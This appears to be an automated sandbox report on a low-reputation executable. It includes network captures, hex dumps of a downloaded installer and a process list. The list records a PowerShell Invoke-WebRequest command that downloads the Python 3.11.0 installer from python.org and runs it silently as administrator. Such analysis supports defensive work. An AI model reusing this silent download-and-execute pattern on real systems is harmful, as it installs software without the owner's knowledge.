                                                                                                                                Oct 14, 2024 08:06:49.240537882 CEST1.1.1.1192.168.2.70xb761No error (0)dualstack.python.map.fastly.net151.101.192.223A (IP address)IN (0x0001)false
                                                                                                                                Oct 14, 2024 08:06:49.240537882 CEST1.1.1.1192.168.2.70xb761No error (0)dualstack.python.map.fastly.net151.101.64.223A (IP address)IN (0x0001)false
                                                                                                                                • www.python.org
                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.749715151.101.0.2234433452C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-10-14 06:06:49 UTC200OUTGET /ftp/python/3.11.0/python-3.11.0-amd64.exe HTTP/1.1
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                Host: www.python.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-10-14 06:06:49 UTC587INHTTP/1.1 200 OK
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 25157416
                                                                                                                                etag: "6356df2e-17fdf28"
                                                                                                                                last-modified: Mon, 24 Oct 2022 18:53:34 GMT
                                                                                                                                server: nginx
                                                                                                                                x-clacks-overhead: GNU Terry Pratchett
                                                                                                                                content-type: application/octet-stream
                                                                                                                                via: 1.1 varnish, 1.1 varnish, 1.1 varnish
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Age: 747089
                                                                                                                                Date: Mon, 14 Oct 2024 06:06:49 GMT
                                                                                                                                X-Served-By: cache-lga21929-LGA, cache-lga21929-LGA, cache-ewr-kewr1740061-EWR
                                                                                                                                X-Cache: MISS, HIT, HIT
                                                                                                                                X-Cache-Hits: 0, 295, 0
                                                                                                                                X-Timer: S1728886010.791827,VS0,VE1
                                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                2024-10-14 06:06:49 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ef 12 c0 5b ab 73 ae 08 ab 73 ae 08 ab 73 ae 08 ce 15 ad 09 a1 73 ae 08 ce 15 ab 09 24 73 ae 08 f9 1b aa 09 b8 73 ae 08 f9 1b ad 09 b8 73 ae 08 f9 1b ab 09 80 73 ae 08 ce 15 aa 09 be 73 ae 08 ce 15 a8 09 a9 73 ae 08 ce 15 af 09 ba 73 ae 08 ab 73 af 08 e5 72 ae 08 0e 1a ab 09 e0 73 ae 08 0e 1a 51 08 aa 73 ae 08 ab 73 39 08 a9 73 ae 08 0e 1a ac 09 aa 73 ae 08 52 69 63 68 ab 73 ae
                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$[ssss$ssssssssrsQss9ssRichs
                                                                                                                                2024-10-14 06:06:49 UTC1378INData Raw: 8b 45 08 83 c0 fc 50 ff 15 f8 b0 44 00 5d c2 04 00 55 8b ec 51 53 56 57 33 f6 56 56 6a 01 56 89 75 fc ff 15 ec b0 44 00 68 28 b5 44 00 ff 15 f0 b0 44 00 8b d8 68 3c b5 44 00 53 ff 15 f4 b0 44 00 8b 3d e8 b0 44 00 85 c0 74 0d 68 00 08 00 00 ff d0 85 c0 75 39 ff d7 68 58 b5 44 00 53 ff 15 f4 b0 44 00 85 c0 74 0b 68 24 b5 44 00 ff d0 85 c0 75 02 ff d7 39 75 0c 76 15 8b 7d 08 8d 45 fc 50 ff 34 b7 e8 0d 27 00 00 46 3b 75 0c 72 ee 5f 5e 5b c9 c2 08 00 33 c0 50 50 6a 01 50 ff 15 ec b0 44 00 c3 55 8b ec 51 51 56 57 33 ff 8d 45 fc 57 68 6c b5 44 00 50 89 7d fc 89 7d f8 e8 fb 0d 00 00 8b f0 85 f6 78 62 57 ff 75 08 8d 45 fc 50 e8 e8 0d 00 00 8b f0 85 f6 78 4f 8d 45 f8 50 ff 75 fc ff 15 3c b3 44 00 85 c0 75 2d ff 15 e8 b0 44 00 8b f0 85 f6 7e 0b 0f b7 f6 81 ce 00 00
                                                                                                                                Data Ascii: EPD]UQSVW3VVjVuDh(DDh<DSD=Dthu9hXDSDth$Du9uv}EP4'F;ur_^[3PPjPDUQQVW3EWhlDP}}xbWuEPxOEPu<Du-D~
                                                                                                                                2024-10-14 06:06:49 UTC1378INData Raw: 74 0a be 57 00 07 80 e9 88 00 00 00 83 fb 01 77 29 39 75 14 0f 84 a6 00 00 00 8b 7d 10 80 3f 00 8b 7d 0c 0f 84 97 00 00 00 8b f0 f7 de 1b f6 83 e6 23 81 c6 57 00 07 80 eb 5a ff 75 14 21 75 0c 8d 45 0c ff 75 10 50 53 ff 75 fc e8 4e 06 00 00 8b 55 fc 8b f0 03 55 0c 2b 5d 0c 89 55 fc 89 5d f4 85 f6 78 26 8b 4d 20 f7 c1 00 02 00 00 74 53 83 fb 01 76 4e 8d 43 ff 50 0f b6 c1 50 8d 42 01 50 e8 c6 df 02 00 83 c4 0c eb 35 8b 45 08 8b 55 f8 8b 4d 20 f7 c1 00 1c 00 00 74 18 85 ff 74 14 51 8d 4d f4 51 8d 4d fc 51 52 57 50 e8 a2 06 00 00 8b 5d f4 85 f6 79 08 81 fe 7a 00 07 80 75 15 8b 55 fc 8b 45 18 85 c0 74 02 89 10 8b 45 1c 85 c0 74 02 89 18 5b 5f 8b c6 5e c9 c2 1c 00 55 8b ec 83 ec 10 8b 45 20 56 25 00 01 00 00 57 8b 7d 0c 89 45 f0 74 3c 8b 4d 08 33 c0 8b f0 85 c9
                                                                                                                                Data Ascii: tWw)9u}?}#WZu!uEuPSuNUU+]U]x&M tSvNCPPBP5EUM ttQMQMQRWP]yzuUEtEt[_^UE V%W}Et<M3
                                                                                                                                2024-10-14 06:06:49 UTC1378INData Raw: 89 11 8b 4d 1c 85 c9 74 0d 89 01 eb 09 85 ff 74 05 33 c0 66 89 03 5f 8b c6 5e 5b c9 c2 1c 00 55 8b ec 8b 45 0c 33 c9 85 c0 74 07 3d ff ff ff 7f 76 05 b9 57 00 07 80 85 c9 78 17 68 fe ff ff 7f ff 75 10 6a 00 50 ff 75 08 e8 44 01 00 00 8b c8 eb 0c 85 c0 74 08 8b 45 08 33 d2 66 89 10 8b c1 5d c2 0c 00 55 8b ec 83 7d 08 00 56 8b 75 10 74 17 81 7d 0c ff ff ff 7f 77 0e 56 ff 75 0c ff 75 08 e8 a6 02 00 00 eb 05 b8 57 00 07 80 85 c0 79 07 85 f6 74 03 83 26 00 5e 5d c2 0c 00 55 8b ec 83 7d 08 00 56 8b 75 10 74 17 81 7d 0c ff ff ff 7f 77 0e 56 ff 75 0c ff 75 08 e8 b3 02 00 00 eb 05 b8 57 00 07 80 85 c0 79 07 85 f6 74 03 83 26 00 5e 5d c2 0c 00 55 8b ec 8b 45 0c 56 33 f6 85 c0 74 07 3d ff ff ff 7f 76 05 be 57 00 07 80 85 f6 78 36 53 8b 5d 08 33 f6 57 ff 75 14 8d 78
                                                                                                                                Data Ascii: Mtt3f_^[UE3t=vWxhujPuDtE3f]U}Vut}wVuuWyt&^]U}Vut}wVuuWyt&^]UEV3t=vWx6S]3Wux
                                                                                                                                2024-10-14 06:06:49 UTC1378INData Raw: 00 eb 2a 53 57 ff 75 08 e8 01 06 00 00 8b f0 85 f6 78 10 8b 45 0c 89 38 33 ff 8b 45 10 85 c0 74 0c 89 18 85 ff 74 06 57 e8 2a 19 00 00 5f 5b 8b c6 5e c9 c2 0c 00 55 8b ec 53 8b 5d 10 56 8b 75 0c 57 6a 00 8d 3c 75 02 00 00 00 57 53 e8 59 f2 ff ff 85 c0 78 0c 57 ff 33 56 ff 75 08 e8 19 06 00 00 5f 5e 5b 5d c2 0c 00 55 8b ec 51 53 56 8b 75 08 33 db 21 5d fc 57 33 ff 39 1e 74 30 ff 36 e8 8d 1a 00 00 8b d8 83 fb ff 75 0a bf 57 00 07 80 e9 8e 00 00 00 8d 45 fc d1 eb 50 68 ff ff ff 7f ff 36 e8 93 fa ff ff 8b f8 85 ff 78 76 8b 55 10 85 d2 75 1a 8d 45 10 50 68 ff ff ff 7f ff 75 0c e8 75 fa ff ff 8b f8 85 ff 78 58 8b 55 10 8b cb 8d 42 01 2b 4d fc 3b c8 73 18 8b 5d fc 43 6a 00 03 da 53 56 e8 c1 f1 ff ff 8b f8 85 ff 78 34 8b 55 10 8b 0e 85 c9 74 26 8d 34 12 8d 04 1b
                                                                                                                                Data Ascii: *SWuxE83EttW*_[^US]VuWj<uWSYxW3Vu_^[]UQSVu3!]W39t06uWEPh6xvUuEPhuuxXUB+M;s]CjSVx4Ut&4
                                                                                                                                2024-10-14 06:06:49 UTC1378INData Raw: 85 c0 78 15 68 00 02 00 00 6a 00 6a 00 57 ff 75 0c 56 ff 33 e8 4b f2 ff ff 5f 5e 5b 5d c2 0c 00 55 8b ec 51 56 8b 75 0c 8d 45 fc 50 6a 01 ff 36 e8 c4 f8 ff ff 85 c0 78 32 53 8b 5d 08 57 8b 7d fc 6a 05 6a 04 57 53 e8 06 13 00 00 85 c0 78 19 ff 75 14 8b 0e 8b 03 ff 75 10 8d 04 88 50 e8 7c fb ff ff 85 c0 78 02 89 3e 5f 5b 5e c9 c2 10 00 55 8b ec 56 33 f6 57 8b 7d 08 39 75 0c 76 18 83 3c b7 00 74 0c ff 34 b7 e8 68 13 00 00 85 c0 78 0c 46 3b 75 0c 72 e8 57 e8 58 13 00 00 5f 5e 5d c2 08 00 55 8b ec 5d e9 49 13 00 00 55 8b ec 53 8b 5d 08 56 57 53 ff 15 04 b1 44 00 8b f8 d1 ef 39 7d 10 73 17 be 7a 00 07 80 56 68 c1 05 00 00 68 b4 b5 44 00 e8 31 11 00 00 eb 34 33 f6 85 ff 74 2e 8b 75 0c 0f b7 03 50 e8 4e ed ff ff 8a d0 8d 5b 04 c0 e2 04 88 16 0f b7 43 fe 50 e8 3a
                                                                                                                                Data Ascii: xhjjWuV3K_^[]UQVuEPj6x2S]W}jjWSxuuP|x>_[^UV3W}9uv<t4hxF;urWX_^]U]IUS]VWSD9}szVhhD143t.uPN[CP:
                                                                                                                                2024-10-14 06:06:49 UTC1378INData Raw: 45 f8 50 ff 75 fc ff 36 e8 6a f0 ff ff 8b d0 85 d2 78 20 8b 0e 8b 45 f8 57 6a 5c 5f 66 3b 7c 41 fe 5f 74 0f 6a 01 68 fc b7 44 00 56 e8 a2 f3 ff ff 8b d0 8b c2 5e c9 c2 04 00 55 8b ec 83 ec 10 53 8b 5d 0c 56 33 f6 8b ce 8b d6 0f b7 03 89 4d f4 89 4d fc 57 8b fe 66 85 c0 0f 84 17 01 00 00 6a 22 8b f0 c7 45 f0 5c 00 00 00 59 6a 20 58 66 3b c6 74 2d 6a 09 58 66 3b c6 74 25 6a 0a 58 66 3b c6 74 1d 6a 0b 58 66 3b c6 74 15 66 3b ce 75 06 33 ff 47 42 eb 0d 6a 5c 58 66 3b c6 75 05 eb f3 33 ff 47 83 c3 02 42 0f b7 03 8b f0 66 85 c0 75 ba 8b 4d f4 8b 5d 0c 85 ff 0f 84 b5 00 00 00 8d 42 03 50 8d 45 fc 50 e8 f2 f2 ff ff 8b f0 85 f6 0f 88 d4 00 00 00 8b 55 fc 6a 22 58 66 89 02 8b c3 83 c2 02 0f b7 00 66 85 c0 74 76 8b f8 33 c9 0f b7 c7 8b f1 66 39 7d f0 75 0f 6a 5c 5f
                                                                                                                                Data Ascii: EPu6jx EWj\_f;|A_tjhDV^US]V3MMWfj"E\Yj Xf;t-jXf;t%jXf;tjXf;tf;u3GBj\Xf;u3GBfuM]BPEPUj"Xfftv3f9}uj\_
                                                                                                                                2024-10-14 06:06:49 UTC1378INData Raw: f4 f6 45 10 01 89 7d fc 0f 84 0b 01 00 00 6a 40 8d 45 fc c7 45 f4 40 00 00 00 50 e8 3d ee ff ff 8b f0 85 f6 0f 88 08 02 00 00 ff 75 f4 8b 3d 14 b1 44 00 ff 75 fc ff 75 0c ff d7 85 c0 75 33 ff 15 e8 b0 44 00 8b f0 85 f6 7e 0b 0f b7 f6 81 ce 00 00 07 80 85 f6 78 05 be 05 40 00 80 56 68 08 01 00 00 68 ac b7 44 00 e8 da 06 00 00 e9 c0 01 00 00 8b 5d f4 3b d8 73 62 50 89 45 f4 8d 45 fc 50 e8 d7 ed ff ff 8b f0 85 f6 0f 88 a2 01 00 00 ff 75 f4 ff 75 fc ff 75 0c ff d7 85 c0 75 26 ff 15 e8 b0 44 00 8b f0 85 f6 7e 0b 0f b7 f6 81 ce 00 00 07 80 85 f6 78 05 be 05 40 00 80 56 68 13 01 00 00 eb 9e 8b 5d f4 3b d8 73 0f b8 7a 00 07 80 50 8b f0 68 18 01 00 00 eb 88 3d 04 01 00 00 76 34 8d 45 fc 50 e8 0f 04 00 00 8d b0 a9 ff f8 7f f7 de 1b f6 23 f0 0f 8c 35 01 00 00 8d 45
                                                                                                                                Data Ascii: E}j@EE@P=u=Duuu3D~x@VhhD];sbPEEPuuuu&D~x@Vh];szPh=v4EP#5E
                                                                                                                                2024-10-14 06:06:49 UTC1378INData Raw: 08 50 56 e8 e7 f1 ff ff 8b c8 85 c9 78 52 8b 4d 08 8d 41 fe 85 c0 74 32 85 ff 75 12 e8 d4 03 03 00 c7 00 16 00 00 00 e8 0c 03 03 00 eb 1c 3b c8 73 0d e8 be 03 03 00 c7 00 22 00 00 00 eb e8 50 57 56 e8 39 ba 02 00 83 c4 0c 6a 07 68 ec b7 44 00 53 e8 8a ea ff ff 8b c8 eb 05 b9 57 00 07 80 5f 5e 8b c1 5b 5d c2 04 00 55 8b ec 51 56 8b 75 0c 8d 45 fc 57 8b 7d 08 68 ff ff ff 7f 50 56 57 e8 fd 00 00 00 85 c0 78 27 81 7d 14 fe ff ff 7f 76 07 b8 57 00 07 80 eb 17 ff 75 14 8b 45 fc 2b f0 ff 75 10 6a 00 56 8d 04 47 50 e8 f8 e5 ff ff 5f 5e c9 c2 10 00 55 8b ec 51 56 8b 75 0c 8d 45 fc 57 8b 7d 08 68 ff ff ff 7f 50 56 57 e8 b0 00 00 00 85 c0 78 19 8b 45 fc 2b f0 68 fe ff ff 7f ff 75 10 6a 00 56 8d 04 47 50 e8 b9 e5 ff ff 5f 5e c9 c2 0c 00 55 8b ec 8b 45 0c 33 c9 85 c0
                                                                                                                                Data Ascii: PVxRMAt2u;s"PWV9jhDSW_^[]UQVuEW}hPVWx'}vWuE+ujVGP_^UQVuEW}hPVWxE+hujVGP_^UE3
                                                                                                                                2024-10-14 06:06:49 UTC1378INData Raw: f3 85 f6 74 06 56 e8 62 fe ff ff 5f 5e 8b c3 5b 5d c2 10 00 bb 0e 00 07 80 53 6a 61 68 88 b8 44 00 e8 5d fc ff ff eb e3 55 8b ec ff 75 08 6a 00 ff 15 d4 b2 44 00 50 ff 15 5c b1 44 00 5d c2 04 00 55 8b ec 56 8b 75 14 85 f6 75 04 33 c0 eb 6d 8b 45 08 85 c0 75 13 e8 37 fe 02 00 6a 16 5e 89 30 e8 70 fd 02 00 8b c6 eb 53 57 8b 7d 10 85 ff 74 14 39 75 0c 72 0f 56 57 50 e8 1f af 02 00 83 c4 0c 33 c0 eb 36 ff 75 0c 6a 00 50 e8 0d ba 02 00 83 c4 0c 85 ff 75 09 e8 f6 fd 02 00 6a 16 eb 0c 39 75 0c 73 13 e8 e8 fd 02 00 6a 22 5e 89 30 e8 21 fd 02 00 8b c6 eb 03 6a 16 58 5f 5e 5d c3 55 8b ec 51 53 33 db 56 8b 75 08 8b c3 89 45 fc 57 8b fb 85 f6 74 37 66 39 1e 74 28 56 ff 15 80 b1 44 00 85 c0 74 1a 8d 45 fc 47 50 56 e8 a4 f8 ff ff 85 c0 78 0b 8b 45 fc 8b f0 85 c0 75 d8
                                                                                                                                Data Ascii: tVb_^[]SjahD]UujDP\D]UVuu3mEu7j^0pSW}t9urVWP36ujPuj9usj"^0!jX_^]UQS3VuEWt7f9t(VDtEGPVxEu


                                                                                                                                Click to jump to process

                                                                                                                                Click to jump to process

                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                Click to jump to process

                                                                                                                                Target ID:0
                                                                                                                                Start time:02:06:41
                                                                                                                                Start date:14/10/2024
                                                                                                                                Path:C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Users\user\Desktop\3Af7PybsUi.exe"
                                                                                                                                Imagebase:0x7ff726290000
                                                                                                                                File size:20'072'422 bytes
                                                                                                                                MD5 hash:E5538B58A077CF3E5D621294AA04BECA
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:3
                                                                                                                                Start time:02:06:44
                                                                                                                                Start date:14/10/2024
                                                                                                                                Path:C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Users\user\Desktop\3Af7PybsUi.exe"
                                                                                                                                Imagebase:0x7ff726290000
                                                                                                                                File size:20'072'422 bytes
                                                                                                                                MD5 hash:E5538B58A077CF3E5D621294AA04BECA
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:4
                                                                                                                                Start time:02:06:47
                                                                                                                                Start date:14/10/2024
                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath "
                                                                                                                                Imagebase:0x7ff741d30000
                                                                                                                                File size:452'608 bytes
                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:5
                                                                                                                                Start time:02:06:47
                                                                                                                                Start date:14/10/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:8
                                                                                                                                Start time:03:09:40
                                                                                                                                Start date:14/10/2024
                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\tmpaf99aaqq.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe" /quiet InstallAllUsers=1 PrependPath=1 Include_test=0
                                                                                                                                Imagebase:0xa0000
                                                                                                                                File size:25'157'416 bytes
                                                                                                                                MD5 hash:4FE11B2B0BB0C744CF74AFF537F7CD7F
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:9
                                                                                                                                Start time:03:09:41
                                                                                                                                Start date:14/10/2024
                                                                                                                                Path:C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exe" -burn.clean.room="C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe" -burn.filehandle.attached=640 -burn.filehandle.self=680 /quiet InstallAllUsers=1 PrependPath=1 Include_test=0
                                                                                                                                Imagebase:0x850000
                                                                                                                                File size:876'424 bytes
                                                                                                                                MD5 hash:7711C60D5DB60B1DFD6660016CF02D6F
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:10
                                                                                                                                Start time:03:09:42
                                                                                                                                Start date:14/10/2024
                                                                                                                                Path:C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exe" -q -burn.elevated BurnPipe.{5461B88A-4125-4C2C-9E7F-F7CAF41CDAA7} {4FB5F196-D94A-42FD-9D71-D58BBB67B36C} 2908
                                                                                                                                Imagebase:0x50000
                                                                                                                                File size:876'424 bytes
                                                                                                                                MD5 hash:7711C60D5DB60B1DFD6660016CF02D6F
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:16
                                                                                                                                Start time:03:09:54
                                                                                                                                Start date:14/10/2024
                                                                                                                                Path:C:\Windows\System32\OpenWith.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                Imagebase:0x7ff658000000
                                                                                                                                File size:123'984 bytes
                                                                                                                                MD5 hash:E4A834784FA08C17D47A1E72429C5109
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:18
                                                                                                                                Start time:03:09:55
                                                                                                                                Start date:14/10/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                Imagebase:0x7ff7b4ee0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:false

                                                                                                                                Target ID:19
                                                                                                                                Start time:03:09:57
                                                                                                                                Start date:14/10/2024
                                                                                                                                Path:C:\Windows\System32\SrTasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:1
                                                                                                                                Imagebase:0x7ff64edc0000
                                                                                                                                File size:59'392 bytes
                                                                                                                                MD5 hash:2694D2D28C368B921686FE567BD319EB
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:false

                                                                                                                                Target ID:20
                                                                                                                                Start time:03:09:57
                                                                                                                                Start date:14/10/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:false

                                                                                                                                Target ID:21
                                                                                                                                Start time:03:10:00
                                                                                                                                Start date:14/10/2024
                                                                                                                                Path:C:\Windows\System32\msiexec.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                Imagebase:0x7ff627280000
                                                                                                                                File size:69'632 bytes
                                                                                                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:23
                                                                                                                                Start time:03:10:07
                                                                                                                                Start date:14/10/2024
                                                                                                                                Path:C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" /burn.runonce
                                                                                                                                Imagebase:0x480000
                                                                                                                                File size:876'424 bytes
                                                                                                                                MD5 hash:7711C60D5DB60B1DFD6660016CF02D6F
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:24
                                                                                                                                Start time:03:10:07
                                                                                                                                Start date:14/10/2024
                                                                                                                                Path:C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" /quiet /burn.log.append "C:\Users\user~1\AppData\Local\Temp\Python 3.11.0 (64-bit)_20241014030941.log" InstallAllUsers=1 PrependPath=1 Include_test=0
                                                                                                                                Imagebase:0x480000
                                                                                                                                File size:876'424 bytes
                                                                                                                                MD5 hash:7711C60D5DB60B1DFD6660016CF02D6F
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:25
                                                                                                                                Start time:03:10:08
                                                                                                                                Start date:14/10/2024
                                                                                                                                Path:C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -burn.clean.room="C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -burn.filehandle.attached=520 -burn.filehandle.self=540 /quiet /burn.log.append "C:\Users\user~1\AppData\Local\Temp\Python 3.11.0 (64-bit)_20241014030941.log" InstallAllUsers=1 PrependPath=1 Include_test=0
                                                                                                                                Imagebase:0x480000
                                                                                                                                File size:876'424 bytes
                                                                                                                                MD5 hash:7711C60D5DB60B1DFD6660016CF02D6F
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:26
                                                                                                                                Start time:03:10:15
                                                                                                                                Start date:14/10/2024
                                                                                                                                Path:C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" /burn.runonce
                                                                                                                                Imagebase:0x480000
                                                                                                                                File size:876'424 bytes
                                                                                                                                MD5 hash:7711C60D5DB60B1DFD6660016CF02D6F
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:27
                                                                                                                                Start time:03:10:15
                                                                                                                                Start date:14/10/2024
                                                                                                                                Path:C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" /quiet /burn.log.append "C:\Users\user~1\AppData\Local\Temp\Python 3.11.0 (64-bit)_20241014030941.log" InstallAllUsers=1 PrependPath=1 Include_test=0
                                                                                                                                Imagebase:0x480000
                                                                                                                                File size:876'424 bytes
                                                                                                                                MD5 hash:7711C60D5DB60B1DFD6660016CF02D6F
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:28
                                                                                                                                Start time:03:10:16
                                                                                                                                Start date:14/10/2024
